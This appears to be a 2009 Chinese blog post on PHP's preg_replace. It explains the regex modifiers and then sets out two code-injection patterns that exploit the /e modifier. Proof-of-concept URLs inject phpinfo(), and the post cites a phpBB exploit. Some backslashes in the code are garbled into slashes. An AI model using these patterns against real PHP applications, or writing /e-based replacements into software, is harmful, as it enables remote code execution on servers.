關於preg_replace函式的問題講解

cnbird發表於2009-03-05

http://www.jb51.net/article/8676.htm

請問下那此句語句的作用。給我解釋一下其中的“?”,“e”,”i”,”s”符號分別是什麼意思,和它們起到了什麼作用。還有就是除了”/eis”外還有其他什麼模式了嗎?
如果有相關的學習資料可以給我嗎?謝謝,各位的幫助!謝謝。
$post=preg_replace(“//[html/](.+?)/[//html/]/eis”,”htmlcode(`//1`)”,$post);
修飾符:
正則表示式裡面的修飾符可以改變正則的很多特性,使得正則表示式更加適合你的需要(注意:修飾符對於大小寫是敏感的,這意味著”e”並不等於”E”)。正則表示式裡面的修飾符如下:
i :如果在修飾符中加上”i”,則正則將會取消大小寫敏感性,即”a”和”A” 是一樣的。
m:預設的正則開始”^”和結束”$”只是對於正則字串如果在修飾符中加上”m”,那麼開始和結束將會指字串的每一行:每一行的開頭就是”^”,結尾就是”$”。
s:如果在修飾符中加入”s”,那麼預設的”.”代表除了換行符以外的任何字元將會變成任意字元,也就是包括換行符!
x:如果加上該修飾符,表示式中的空白字元將會被忽略,除非它已經被轉義。
e:本修飾符僅僅對於replacement有用,代表在replacement中作為PHP程式碼。
A:如果使用這個修飾符,那麼表示式必須是匹配的字串中的開頭部分。比如說”/a/A”匹配”abcd”。
E:與”m”相反,如果使用這個修飾符,那麼”$”將匹配絕對字串的結尾,而不是換行符前面,預設就開啟了這個模式。
U:和問號的作用差不多,用於設定”貪婪模式”。
?表單非貪婪匹配,即儘可能少的匹配

 

#############
##總結模型###
#############
1.直接在preg_replace第2個變數執行的模式:
echo preg_replace(“/test/e”,$h,”jutst test”);
?>
提交http://127.0.0.1/test/11/preg.php?h=phpinfo()
例項如:phpbb的viewtopic.php變數$highliht_match提交php程式碼執行漏洞

2.通過//1[或者//n]提取第3個變數裡的php程式碼並執行的模式:
echo preg_replace(“//s*/[php/](.+?)/[//php/]/s*/ies”, “//1“, $h);
?>
提交:http://127.0.0.1/test/11/preg.php?h=[php]phpinfo()[/php]

參考:
r57的exp:http://www.milw0rm.com/exploits/1720
http://superhei.blogbus.com/logs/2398452.html


相關文章